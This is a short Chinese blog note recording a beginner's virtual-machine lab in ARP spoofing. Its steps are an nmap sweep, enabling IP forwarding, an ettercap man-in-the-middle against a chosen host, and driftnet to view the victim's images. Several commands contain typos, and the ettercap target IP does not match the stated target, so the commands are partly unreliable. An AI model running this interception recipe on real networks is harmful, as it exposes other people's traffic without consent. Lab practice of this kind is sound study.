虚拟机下模拟内网APP欺骗(小白)

来源:互联网 发布:linux下svn 钩子函数 编辑:程序博客网 时间:2024/05/01 06:00

过程比较顺利 ,教程比较全面,但这远远不够, 原理一点还不懂.先把过程写下来吧,供自己以后查看

1 查看本机IP信息

    ifcongfig

## 查看本机信息

2 扫描局域网IP

    nmap -sP 192.168.58.0/24

01_01(001).jpg

选择 192.168.58.138 作为目标ip

3 开启流量转发

    ehco 1 >> /proc/sys/net/ipv4/ip forward

4 使用arpspoof/ettercap,选一个进行arp欺骗。获取从192.168.58.1(路由器) 到 192.168.58.138(目标机)的流量

    ettercap -T -q -M ARP /172.17.171.21// /

5 用driftnet进行流量监控,显示图片

    driftnet -i eth0

6 结果如图 在同一主机中的虚拟机上的xp(192.168.58.138)正在浏览图片(女神 刘亦菲),用driftnet 清楚显示

01_01(002).jpg

参考链接 http://blog.csdn.net/u012218652/article/details/70761564